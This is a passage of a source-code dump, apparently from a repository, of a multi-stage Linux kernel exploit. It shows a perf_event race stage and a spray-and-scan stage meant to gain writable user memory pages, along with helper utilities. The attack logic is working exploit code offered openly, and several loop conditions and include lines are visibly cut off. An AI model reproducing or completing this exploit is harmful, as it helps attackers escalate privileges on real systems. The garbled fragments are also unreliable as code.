98 | 99 | if(exp_data->usec_delay<=exp_data->usec_delay_min-1) 100 | { 101 | exp_data->race_done = 1; 102 | race_barrier_wait(&exp_data->result_barrier); 103 | return NULL; 104 | } 105 | race_barrier_wait(&exp_data->result_barrier); 106 | continue; 107 | } 108 | //We accessed at least some pages 109 | //Since we are gradually decreasing the delay assume we are never 110 | //too early by so much that we would have grabbed all pages 111 | 112 | printf("[C] Won stage 2 race\n"); 113 | size_t correction = 0; 114 | //If we caught sigbus the last page we tried to access wasn't valid anymore 115 | if(exp_data->caught_sigbus) 116 | { 117 | printf("[C] Caught sigbus, correcting offset\n"); 118 | correction = PAGE_SIZE; 119 | } 120 | exp_data->mapped_start = mmap_aux_curr+correction; 121 | 
exp_data->mapped_end = mmap_aux_end+PAGE_SIZE; 122 | exp_data->race_done = 1; 123 | exp_data->success = 1; 124 | race_barrier_wait(&exp_data->result_barrier); 125 | return NULL; 126 | } 127 | } -------------------------------------------------------------------------------- /stage3.c: -------------------------------------------------------------------------------- 1 | #include "exploit.h" 2 | #include 3 | #include 4 | 5 | /* Stage 3 6 | * This exploit stage performs a spray to try and get writable user pages. 7 | * To do this pages of memory are continually allocated by mmaping new perf_events and mapping their user pages. 8 | * The user page is then filled with a pattern and read back through the additional pages in the vma from stage 2. 9 | * If the pattern is found the sprayed pages are filled with their spray indices and then read back again to verify 10 | * that the pattern wasn't by coincidence and to determine the page offsets. 11 | */ 12 | 13 | //Dumb wrapper to check if a page already found a corresponding other page 14 | int page_already_found(struct exp_sync_stage3 *exp_data, void* addr, int idx) 15 | { 16 | for(int i=0; iwritable_page_count; i++) 17 | { 18 | if(addr && addr==exp_data->writable_pages[i].writable_page) 19 | return 1; 20 | else if(idx>=0 && idx==exp_data->writable_pages[i].page_index) 21 | return 1; 22 | } 23 | return 0; 24 | } 25 | 26 | void stage3_parent() 27 | { 28 | struct exp_sync_stage3 *exp_data = &global_exp_data->stage3; 29 | struct perf_event_attr attrs = {0}; 30 | memset((char*)&attrs,0,sizeof(attrs)); 31 | attrs.size = sizeof(attrs); 32 | attrs.disabled = 1; 33 | attrs.exclude_kernel = 1; 34 | attrs.exclude_hv = 1; 35 | attrs.type = PERF_TYPE_SOFTWARE; 36 | attrs.config = PERF_COUNT_SW_DUMMY; 37 | printf("[P] Starting the spray\n"); 38 | struct spray_map_info *spray_infos = exp_data->spray_infos; 39 | while(!exp_data->finished) 40 | { 41 | race_barrier_wait(&exp_data->rdy_barrier); 42 | for(int i=0; ispray_barrier); 57 | 
while(exp_data->scanning) 58 | { 59 | if(exp_data->req_change) 60 | { 61 | exp_data->req_change = 0; 62 | for(int i=0; ichange_barrier); 71 | } 72 | } 73 | race_barrier_wait(&exp_data->check_barrier); 74 | for(int i=0; iresult_barrier); 85 | } 86 | } 87 | 88 | int is_page_same_value(char* page_start, char val) 89 | { 90 | char* end = page_start+PAGE_SIZE; 91 | for(char* vcurr = page_start; vcurrwritable_page_count == STAGE3_ABS_THRESHOLD) 102 | return 1; 103 | if(exp_data->num_iterations == STAGE3_MAX_ITERATIONS) 104 | return 1; 105 | if(exp_data->writable_page_count == exp_data->total_page_count) 106 | return 1; 107 | 108 | if(exp_data->num_iterations < STAGE3_MIN_ITERATIONS) 109 | return 0; 110 | //If we've found more than the fraction of remaining iterations we stop early 111 | //i.e. if writable_page_count/stage3_abs_threshold > 1-num_iterations/max_iterations 112 | //to work with integers do a slight modification 113 | //writable_page_count*max_iterations > (max_iterations-num_iterations)*stage3_abs_threshold 114 | int rem_iterations = STAGE3_MAX_ITERATIONS-exp_data->num_iterations; 115 | if(exp_data->writable_page_count*STAGE3_MAX_ITERATIONS >= rem_iterations*STAGE3_ABS_THRESHOLD) 116 | return 1; 117 | return 0; 118 | } 119 | 120 | void stage3_child() 121 | { 122 | struct exp_sync_stage3 *exp_data = &global_exp_data->stage3; 123 | exp_data->writable_page_count = 0; 124 | char* addr = (char*)exp_data->mapped_start; 125 | char* addr_end = (char*)exp_data->mapped_end; 126 | exp_data->total_page_count = (addr_end-addr)/PAGE_SIZE; 127 | printf("[C] Scanning %d pages, range %p-%p\n", exp_data->total_page_count, addr, addr_end); 128 | while(!exp_data->finished) 129 | { 130 | exp_data->num_iterations++; 131 | char* curr = addr; 132 | race_barrier_wait(&exp_data->rdy_barrier); 133 | 134 | exp_data->scanning = 1; 135 | race_barrier_wait(&exp_data->spray_barrier); 136 | //We only check the first char on the page, because if we find a change in another char we will never 
pass the check if the whole page is identical anyway 137 | for(;currreq_change = 1; 157 | race_barrier_wait(&exp_data->change_barrier); 158 | //We fill each page with its index and check if the whole page changed 159 | 160 | //Page was coincidentally as we were expecting, but didn't change later 161 | //Skip to next page 162 | 163 | char first_val = *curr_page; 164 | 165 | if(!is_page_same_value(curr_page, first_val)) 166 | continue; 167 | 168 | int idx = exp_data->writable_page_count; 169 | exp_data->writable_pages[idx].writable_page = curr_page; 170 | exp_data->writable_pages[idx].page_index = (int)first_val; 171 | exp_data->writable_page_count++; 172 | } 173 | } 174 | exp_data->scanning = 0; 175 | race_barrier_wait(&exp_data->check_barrier); 176 | if(finished_with_stage3(exp_data)) 177 | { 178 | printf("[C] Unmapping readable pages with writable counterpart\n"); 179 | for(int i=0; iwritable_page_count; i++) 180 | { 181 | void* curr_page = (void*)exp_data->writable_pages[i].writable_page; 182 | if(munmap(curr_page,PAGE_SIZE)<0) 183 | { 184 | perror("[C] munmap writable"); 185 | } 186 | } 187 | exp_data->finished = 1; 188 | } 189 | exp_data->scan_done = 1; 190 | exp_data->scanning = 0; 191 | race_barrier_wait(&exp_data->result_barrier); 192 | } 193 | } -------------------------------------------------------------------------------- /util.c: -------------------------------------------------------------------------------- 1 | #define _GNU_SOURCE 2 | #include "util.h" 3 | #include 4 | #include 5 | 6 | void hexdump(char* data, size_t nBytes) 7 | { 8 | char dump_buf[140]; 9 | int idx=0,sidx = 0; 10 | printf("dump@%p\n",data); 11 | while(idx 4 | #include 5 | #define perror_exit(s) do{perror(s); exit(-1);}while(0); 6 | void hexdump(char* data, size_t nBytes); 7 | void assignToThisCore(int core_id); 8 | #endif --------------------------------------------------------------------------------